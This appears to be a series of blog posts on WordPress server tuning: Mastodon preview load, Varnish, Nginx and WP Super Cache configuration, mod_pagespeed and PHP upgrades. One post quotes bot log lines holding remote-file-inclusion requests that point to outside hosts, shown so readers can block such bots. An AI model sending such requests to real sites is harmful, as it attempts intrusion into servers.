You might not be on Mastodon yet, but your blog could get a torrent of traffic from Mastodon, or other Fediverse network if it’s shared there.
If your website is mentioned there, it might be the “victim” of an inadvertent denial of service attack, as hundreds or thousands of servers request the URL in the 60 seconds or so afterwards. That is precisely what JWZ blogged about last month when his site was taken down by Mastodon servers.
Every time I do a new blog post, within a second I have over a thousand simultaneous hits of that URL on my web server from unique IPs. Load goes over 100, and mariadb stops responding.
JWZ has over 8,000 followers. Every time he shares a post on Mastodon, the instances (servers) where those followers live will send a request to his blog to generate a preview. Actually, two requests will be sent:
A request for the wp-json embed for the page.
A request for the page that was shared.
Eventually, he blocked the Mastodon user agent. That stops previews of his website showing up on Mastodon posts, but resolves the problem for his website.
Yesterday morning, I decided to see what effect sharing a link on my Mastodon account would have on my server. My Mastodon account has 1.8K followers. A far cry from the number of followers JWZ has, but still enough to test my server.
I wanted to test several scenarios:
Caching the post before sharing.
Changing Apache configuration.
Sharing without caching on my server.
My server is at Linode. I pay an average of $24/month to run this site and my photoblog is on it too where I share a daily photo + link on Mastodon. It’s not a heavy-duty server that can withstand a huge amount of traffic.
If you’d like to skip the details, my server coped fine with sharing a URL from here to Mastodon. The load average went up for about 20 seconds, topping out at the max for about 5 seconds before things calmed down. It was responsive the whole time. Install a full-page caching plugin like WP Super Cache, Jetpack Boost and WP Rest Cache and your site will probably be fine. Jetpack Boost and the Jetpack Image Accelerator will help when human visitors arrive.
1 minute load average topped out at 1.34 for 5 seconds.
The page was cached by WP Super Cache, but I had set the garbage collection TTL to 60 seconds and I believe it expired halfway through the test, so it had to generate the cache again. Once I adjusted that, and set the TTL to 600 seconds, the second test performed better. The page remained cached throughout:
273 requests for the page embed.
289 requests for the page itself.
1 minute load average topped out at 0.71 for 5 seconds.
The main points of my Apache configuration:
Keep alives are disabled.
5 start servers
Minimum 10 spare servers
When I reduced the start and minimum spare servers to 1, the next test took longer to complete, and the load average rose to 1.24, even on a fully cached page. This was expected as the server didn’t have the spare capacity to deal with the sudden traffic.
After reverting the changes to Apache, I disabled caching on my blog and shared another URL. The load average only rose to 1.12 for a very short time. I was pleased with that. While caching does help, my server could cope with that traffic.
A sample of the user agents used by Mastodon instances hitting my blog for previews
I suspected that there was one hit per Mastodon instance on my site. I checked my logs and was proved right. For all the accounts that follow me on mastodon.social, only one request was made. That does mean the onslaught of requests isn’t as bad as it might be. Instead of 1,800 requests for a page, there were far fewer. I did notice that a Friendica instance requested one of my test URLs several times.
Mastodon and other Fediverse servers will start requesting a preview within a second of you sharing your post on the network. It helps if your server is running some sort of caching.
If you have many Mastodon followers or if you’re worried about a DDoS from Mastodon, the following will help:
Make sure Apache/Nginx has the spare capacity to grow quickly and respond to a sudden torrent of requests.
Use “expert caching” in WP Super Cache which serves the cached page using mod_rewrite. That will mean your blog post is served almost as fast as requesting a text file from the server. No PHP is executed at all.
Install WP Rest Cache as it will soon cache the embed page request.
Install Jetpack and enable the Image Accelerator and Jetpack Boost for human visitors who come later.
This problem has existed for a long time. Popular blogs had the same issue when they published new content and people following their blogs (through RSS feed readers, remember them?) hit the server looking for the new post. At least with Mastodon, you can load the post in a private browser window and cache it before sharing it. I want to write a WP Super Cache add-on plugin that allows the site owner to preload a new post as it’s published. That will ensure the new content is ready for sharing. I haven’t started work on that yet, so don’t ask when it’ll be done. Maybe someone else will beat me to it and claim all the credit!
Varnish is an open source, state of the art web application accelerator.
What it does is make your existing site faster by caching requests so your web server doesn’t have to handle them. This helps because your web server may be a lumbering giant like Apache that is loaded up with extra functionality like PHP, the GD library, mod_rewrite and all the other tools you need to make your website. All these modules unfortunately make your general purpose web server slower and heavier so by avoiding it your site spits out pages much faster!
Varnish sits in front of your webserver. Most documentation I’ve read on the subject suggest having Apache listen on any port other than port 80 and then have Varnish listen on port 80 of the external IP address. There’s no need to do this as I configured Apache to listen on port 80 of the 127.0.0.1 or localhost address while Varnish sits on the external IP.
Installing Varnish
Setting up Varnish is fairly easy. I’m going to assume that you’re already using Apache and On a Debian based system just use this to install it (as root)
apt-get install varnish
Apache
You need to configure Apache first. It has to listen on port 80 of the localhost interface. Edit /etc/apache2/ports.conf and change the following settings:
NameVirtualHost 127.0.0.1:80
Listen 127.0.0.1:80
Normally Apache listens on port 80 of all interfaces so you’ll probably just have to add “127.0.0.1:” in front of the 80.
Varnish
By default Varnish won’t start. You need to edit /etc/default/varnish. Change the following options in that file:
This tells Varnish that Apache is listening on port 80 of the localhost interface.
I’m going to define several functions in the default.vcl now. Comments in the code should explain what most of it does.
# Called after a document has been successfully retrieved from the backend.
sub vcl_fetch {
# Uncomment to make the default cache "time to live" is 5 minutes, handy
# but it may cache stale pages unless purged. (TODO)
# By default Varnish will use the headers sent to it by Apache (the backend server)
# to figure out the correct TTL.
# WP Super Cache sends a TTL of 3 seconds, set in wp-content/cache/.htaccess
# set beresp.ttl = 300s;
# Strip cookies for static files and set a long cache expiry time.
if (req.url ~ "\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|pdf|txt|tar|wav|bmp|rtf|js|flv|swf|html|htm)$") {
unset beresp.http.set-cookie;
set beresp.ttl = 24h;
}
# If WordPress cookies found then page is not cacheable
if (req.http.Cookie ~"(wp-postpass|wordpress_logged_in|comment_author_)") {
set beresp.cacheable = false;
} else {
set beresp.cacheable = true;
}
# Varnish determined the object was not cacheable
if (!beresp.cacheable) {
set beresp.http.X-Cacheable = "NO:Not Cacheable";
} else if ( req.http.Cookie ~"(wp-postpass|wordpress_logged_in|comment_author_)" ) {
# You don't wish to cache content for logged in users
set beresp.http.X-Cacheable = "NO:Got Session";
return(pass);
} else if ( beresp.http.Cache-Control ~ "private") {
# You are respecting the Cache-Control=private header from the backend
set beresp.http.X-Cacheable = "NO:Cache-Control=private";
return(pass);
} else if ( beresp.ttl < 1s ) {
# You are extending the lifetime of the object artificially
set beresp.ttl = 300s;
set beresp.grace = 300s;
set beresp.http.X-Cacheable = "YES:Forced";
} else {
# Varnish determined the object was cacheable
set beresp.http.X-Cacheable = "YES";
}
if (beresp.status == 404 || beresp.status >= 500) {
set beresp.ttl = 0s;
}
# Deliver the content
return(deliver);
}
sub vcl_hash {
# Each cached page has to be identified by a key that unlocks it.
# Add the browser cookie only if a WordPress cookie found.
if ( req.http.Cookie ~"(wp-postpass|wordpress_logged_in|comment_author_)" ) {
set req.hash += req.http.Cookie;
}
}
# Deliver
sub vcl_deliver {
# Uncomment these lines to remove these headers once you've finished setting up Varnish.
#remove resp.http.X-Varnish;
#remove resp.http.Via;
#remove resp.http.Age;
#remove resp.http.X-Powered-By;
}
# vcl_recv is called whenever a request is received
sub vcl_recv {
# remove ?ver=xxxxx strings from urls so css and js files are cached.
# Watch out when upgrading WordPress, need to restart Varnish or flush cache.
set req.url = regsub(req.url, "\?ver=.*$", "");
# Remove "replytocom" from requests to make caching better.
set req.url = regsub(req.url, "\?replytocom=.*$", "");
remove req.http.X-Forwarded-For;
set req.http.X-Forwarded-For = client.ip;
# Exclude this site because it breaks if cached
#if ( req.http.host == "example.com" ) {
# return( pass );
#}
# Serve objects up to 2 minutes past their expiry if the backend is slow to respond.
set req.grace = 120s;
# Strip cookies for static files:
if (req.url ~ "\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|pdf|txt|tar|wav|bmp|rtf|js|flv|swf|html|htm)$") {
unset req.http.Cookie;
return(lookup);
}
# Remove has_js and Google Analytics __* cookies.
set req.http.Cookie = regsuball(req.http.Cookie, "(^|;\s*)(__[a-z]+|has_js)=[^;]*", "");
# Remove a ";" prefix, if present.
set req.http.Cookie = regsub(req.http.Cookie, "^;\s*", "");
# Remove empty cookies.
if (req.http.Cookie ~ "^\s*$") {
unset req.http.Cookie;
}
if (req.request == "PURGE") {
if (!client.ip ~ purge) {
error 405 "Not allowed.";
}
purge("req.url ~ " req.url " && req.http.host == " req.http.host);
error 200 "Purged.";
}
# Pass anything other than GET and HEAD directly.
if (req.request != "GET" && req.request != "HEAD") {
return( pass );
} /* We only deal with GET and HEAD by default */
# remove cookies for comments cookie to make caching better.
set req.http.cookie = regsub(req.http.cookie, "1231111111111111122222222333333=[^;]+(; )?", "");
# never cache the admin pages, or the server-status page
if (req.request == "GET" && (req.url ~ "(wp-admin|bb-admin|server-status)")) {
return(pipe);
}
# don't cache authenticated sessions
if (req.http.Cookie && req.http.Cookie ~ "(wordpress_|PHPSESSID)") {
return(pass);
}
# don't cache ajax requests
if(req.http.X-Requested-With == "XMLHttpRequest" || req.url ~ "nocache" || req.url ~ "(control.php|wp-comments-post.php|wp-login.php|bb-login.php|bb-reset-password.php|register.php)") {
return (pass);
}
return( lookup );
}
Notes:
Varnish caches Javascript and CSS files without the cache buster ?ver=xxxx parameter. Varnish doesn’t cache any url with a GET parameter so those files weren’t getting cached at all.
The code removes the Cookies for Comments cookie after it checks for GET and HEAD requests. This improved caching significantly as web pages are not cached with and without that cookie. They are all cached without it. The cache hit/miss ratio went up significantly when I made these two changes.
I have a private site on this server that requires login. I had to stop Varnish caching this site as the privacy plugin thought I wasn’t logged in. See the example.com code above.
If pages were purged Varnish could store cached pages for much longer.
As I didn’t modify WordPress so it would issue PURGE commands there are probably issues with the cache keeping slightly stale pages cached but I haven’t seen it happen or receive complaints about that.
PHP
Since all requests to Apache come from the local server PHP will think that the remote host is the local server. By using an auto_prepend_file set in your php.ini or .htaccess file you can tell PHP what the real IP is with this code:
You’ll see a huge improvement if you use Apache, especially if you don’t use a full page caching plugin like WP Super Cache on your WordPress site.
To see exactly how well Varnish is working use varnishstat and watch the ratio of cache hit and miss requests. This will vary depending on your TTL and by how much time Varnish has had to populate the cache. You can also configure logging using varnishncsa as described on this page:
varnishncsa -a -w /var/log/varnish/access.log -D -P /var/run/varnishncsa.pid
Now use multitail to watch /var/log/varnish/access.log and your web server’s access log.
I used a number of sites for help when setting this up. Here are a few:
I have tried Nginx in the past but could not getting it working without causing huge CPU spikes as PHP went a little mad. In comparison, Varnish was simple to install and set up. Have you tried Varnish yet? How can I improve the code above?
Edit: It looks like someone else has done the hard work. I must give the WordPress Varnish plugin a go.
This plugin purges your varnish cache when content is added or edited. This includes when a new post is added, a post is updated or when a comment is posted to your blog.
So I finally got a chance to try mod_pagespeed on this server. I particularly wanted to know if it behaved well with WP Super Cache as I’d read reports that it causes problems.
Unfortunately those problems are real but I’ve been told that a new release will be out shortly to address a few bugs so perhaps this will help.
If you’d like to try mod_pagespeed make sure you disable compression in WP Super Cache and clear the cache first. Even though the docs state that the module always generates uncompressed HTML it appears to do the opposite. In fact, it tries to load mod_deflate:
# more pagespeed.load
LoadModule pagespeed_module /usr/lib/apache2/modules/mod_pagespeed.so
# Only attempt to load mod_deflate if it hasn’t been loaded already.
<IfModule !mod_deflate.c>
LoadModule deflate_module /usr/lib/apache2/modules/mod_deflate.so
</IfModule>
When things were working, supercached files were processed by mod_pagespeed correctly, I noticed inline Javascript was modified to remove whitespace and I presume other changes were made too but I already minify things and have static files off on another domain so perhaps the changes made on my pages are less minimal.
The changes made by mod_pagespeed, like minifying inline Javascript, are not cached by WP Super Cache so your server has to make these changes each time a page is served. I know that mod_deflate does not cache the gzipped page content, but zips up the page each time it’s served. Mod_pagespeed does however provide a caching mechanism so there’s a good chance those changes are cached there. I haven’t looked at the code so I don’t know.
I did have problems with dynamic pages. A simple phpinfo() refused to load quite often, and backend requests sometimes became stuck. Load on the server sky rocketed occasionally, usually when the module cache directory was emptied.
For now I’ve turned mod_pagespeed off but that might change as this is a young project and maturing fast! I’ll update this post whenever this happens.
I wanted to know what IP addresses were hitting my website. I’d done this before and it only took a moment or two to recreate the following commands. Still, here it is for future reference.
If you host your own WordPress blog, it’s probably on Apache. That all fine and good. For most sites Apache works wonderfully, especially as it’s so easy to find information on it, on mod_rewrite and everything else that everyone else uses.
One of the alternatives is Nginx, a really fast webserver that streaks ahead of Apache in terms of performance, but isn’t quite as easy to use. That’s partly because Apache is the default webserver on most Linux distributions and hosts. Want to try Nginx? Here’s how.
Install Nginx. On Debian based systems that’s as easy as
aptitude install nginx
Nginx doesn’t talk PHP out of the box but one way to do it is via spawn-fcgi. Here’s where it gets complicated. (Docs summarised from here)
Install php5-cgi. Again, on Debian systems, that’s
aptitude install php5-cgi
Edit /etc/nginx/sites-available/default and add the following chunk of code to the “server” section:
You’ll probably get an error at the end of the install if Apache is already running on port 80. Edit /etc/lighttpd/lighttpd.conf and uncomment the line
server.port = 80
and change 80 to 81. Now run the apt-get command again and it will install.
/etc/init.d/lighttpd stop
will stop lighttpd running. (You don’t need it)
Create a new text file, /usr/bin/php-fastcgi with this:
#!/bin/sh
/usr/bin/spawn-fcgi -a 127.0.0.1 -p 9000 -u nobody -f /usr/bin/php5-cgi
The user “nobody” should match the user Apache runs as to make things easier to transition.
Make it executable with
chmod 755 /usr/bin/php-fastcgi
Create another new file /etc/init.d/init-fastcgi and make it executable with the chmod command too. Put this in the file:
That’s the PHP part of things. In Debian, the default root is “/var/www/nginx-default” so put an index.php in there to test things out. Stop Apache and start Nginx (if this is a test server only!) and visit your site. Works? Now to get WordPress and WP Super Cache working.
Open up /etc/nginx/sites-enabled/default in your editor and comment out the text already there with # characters. Paste the following in. Change paths and domains to suit your site. (via)
server {
server_name example.com www.example.com;
listen 80;
error_log /www/logs/example.com-error.log;
access_log /www/logs/example.com-access.log;
location ~ \.php$ {
include /etc/nginx/fastcgi_params;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /www/example.com/htdocs$fastcgi_script_name;
}
location / {
gzip on;
gzip_http_version 1.0;
gzip_vary on;
gzip_comp_level 3;
gzip_proxied any;
gzip_types text/plain text/html text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript;
gzip_buffers 16 8k;
root /www/example.com/htdocs;
index index.php index.html index.htm;
# if the requested file exists, return it immediately
if (-f $request_filename) {
break;
}
set $supercache_file '';
set $supercache_uri $request_uri;
if ($request_method = POST) {
set $supercache_uri '';
}
# Using pretty permalinks, so bypass the cache for any query string
if ($query_string) {
set $supercache_uri '';
}
if ($http_cookie ~* "comment_author_|wordpress|wp-postpass_" ) {
set $supercache_uri '';
}
# if we haven't bypassed the cache, specify our supercache file
if ($supercache_uri ~ ^(.+)$) {
set $supercache_file /wp-content/cache/supercache/$http_host/$1index.html;
}
# only rewrite to the supercache file if it actually exists
if (-f $document_root$supercache_file) {
rewrite ^(.*)$ $supercache_file break;
}
# all other requests go to WordPress
if (!-e $request_filename) {
rewrite . /index.php last;
}
}
}
I think the gzip settings above will compress cached files if necessary but Nginx can use the already gzipped Supercache files. The version of Debian I use doesn’t have gzip support compiled in, but if your system does, take a look at the gzip_static directive. Thanks sivel.
Finally, edit /etc/nginx/nginx.conf and make sure the user in the following line matches the user above:
user www-data;
I changed it to “nobody nogroup”.
Now, stop Apache and start Nginx:
/etc/init.d/apache stop; /etc/init.d/nginx start
WP Super Cache will complain about mod_rewrite missing, and you should disable mobile support.
How has it worked out? I only switched on Friday. The server did do more traffic than normal, but I put that down to the floods in Cork. Weekend traffic was perfectly normal.
Load on the site is slightly higher, probably because my anti-bot mod_rewrite rules aren’t working now. Pingdom stats for the site haven’t changed drastically and I think the Minify plugin stopped working, must debug that this week. Switching web servers is a huge task. I disabled mobile support in Supercache because I need to translate those rules to Nginx ones. A little birdie told me that he’s going to be writing a blog post on this very subject soon. Here’s hoping he’ll put fingers to keys soon.
Have you switched to Nginx? How has your switch worked out for you?
Was it realistic? Even a digg that sends you say, 8,000 page views in an hour, isn’t going to exercise your server that much unless your page is chock full of graphics, css and Javascript. (oh wait, web 2.0 ..)
So, Litespeed’s webserver is the one to go for? Maybe not. I can’t for the life of me get compression of the static cache working. When I do, the browser tries to display the gzipped data directly. I can enable the webserver’s gzip function but from tests I don’t think it caches the resulting gzipped file. (btw – mod_deflate, the Apache2 module that does the same thing suffers from this problem too!) Later – testing this again. Litespeed allows you to set a a gzip cache directory. For normal traffic it’s worth doing so pages load faster.
The mod_gzip site is a great resource if you want to find out more about compressing HTTP content.
How did Apache cope? I was serving 100 concurrent requests and Apache didn’t cope too well. It did serve all the file requests eventually but the load average jumped to just over 50 and the site was unavailable to anyone else. It’ll serve 1000 requests for a static file fine, even 10,000 too, but under constant load the server starts to wilt. Unless you have the RAM to keep enough Apache child processes going all the time you’re going to start swapping.
Meanwhile, Litespeed hardly caused a blip in the server’s load average. I’m quite impressed and I’m running it now. It’s also what powers WordPress.com. Even if you’re not using WordPress, you should look at alternatives to Apache.
This leads me nicely on to announce WP Super Cache 0.4! Download it here!
Major new features include:
A “lock down” button. I like to think of this as my “Digg Proof” button. This basically prepares your site for a heavy digging or slashdotting. It locks down the static cache files and doesn’t delete them when a new comment is made.
Automatic updating of your .htaccess file. (Backup your .htaccess before installing the plugin!)
Don’t super cache any request with GET parameters. You really need to use fancy permalinks now.
WordPress search works again.
Better version checking of wp-cache-config.php and advanced-cache.php in case you’re using an old one.
Better support for Microsoft Windows.
Properly serve cached static files on Red Hat/Cent OS systems or others that have an entry for gzip in /etc/mime.types.
The Reject URI function works again and now uses regular expressions!
Support queries should go to the forum. Make sure your posts are tagged “wp-super-cache”, but if you post from that link they will.
If you look through your server logs you’ll probably notice more than a few requests like these:
GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … “libwww-perl/5.805”
GET /2004/02/18/smoking-ban-is-on-the-way/trackback/ … “libwww-perl/5.805”
GET /2004/02/18/irish-car-tax-list/trackback/ … “libwww-perl/5.805”
GET /tag/php//tags.php?BBCodeFile=http://drpepper.gigacities.net/id.txt? … “libwww-perl/5.579”
If you do find them (grep libwww-perl access_log) then add the following code to your .htaccess file. On a WordPress site this file should already be there if you’re using fancy permalinks.
Change “RewriteBase /” to suit your own base directory.
There are other bad guys out there. This page has a long list of rewrite rules to keep out all sorts of bots! I haven’t looked through them myself so YMMV if you try them.
This has the added benefit of reducing load on your server. WordPress sites are dynamically generated. This is great under normal circumstances but when you get a flood of requests it can place an unnecessary load on your site. WP-Cache helps a lot but these rules will stop them dead at the front door!
PS. ‘Course, if you depend on a libwww-perl application then don’t add this rule or you may give yourself a headache trying to figure out why things stopped working!
While looking through this WordPress performance post I realised that eAccelerator might not be running properly on this blog. For some time I’ve noticed this site hasn’t been as quick off the mark as it used to be. Dare I say it, but it was even a little sluggish!
If you’re not familiar with it, eAccelerator is a PHP accelerator. It caches PHP bytecode and performs optimizations to make your PHP site run a lot faster.
I verified that eAccelerator was loaded and then checked my php.ini configuration. Sure enough, the eaccelerator.cache_dir directive was set to “/tmp/eacc/” and that directory was deleted the last time my server rebooted.
A permanent fix is to change the location of the cache dir. Put it anywhere the webserver can read, but don’t put it in /tmp/.
While you’re looking at eAccelerator, upgrade to the latest version, especially if you’re running PHP5.
I upgraded one of my servers to PHP5 this morning. Two things to watch out for:
The location of your php.ini may have changed. It’s probably now in /etc/php5/apache2/. You need to copy over any changes from your old one.
Update your libraries too such as the mysql client and the gd library. Don’t forget you can delete the old ones. apt-get install php5-mysql php5-gd will do the job of installing, the old packages have a php4 prefix.
WP-Cache doesn’t like PHP5 much. If you see a blank page after upgrading to PHP5, then hit reload and it loads, then WP-Cache needs to be modified. Leroy has the fix, open wp-cache-phase2.php in your wp-cache folder and change ob_end_clean() to ob_end_flush(). SImple as that!
The reason for the upgrade? I wanted to install the gd extension, but after lots of fun upgrading everything my browser tried to download every page, complaining that it was a phtml file. I chose the upgrade to PHP5 to fix it!
And finally, the reason for gd, was to get the heatmap in this wordpress click tracking plugin working. It’s like Crazy Egg and it works well, but I couldn’t get it to display a heatmap for any page other than the front page. Some of the comments on Daily Blog Tips where I found it are hilarious. They completely miss the point of using a heatmap!
Close
Ad-blocker not detected
Consider installing a browser extension that blocks ads and other malicious scripts in your browser to protect your privacy and security. Here are a few options.
uBlock Origin is a free, open source, ad blocker for your browser.
Use pi-hole if you have a spare Raspberry Pi on your network.
Set the private DNS settings on your phone to dns.adguard.com to block adverts and trackers.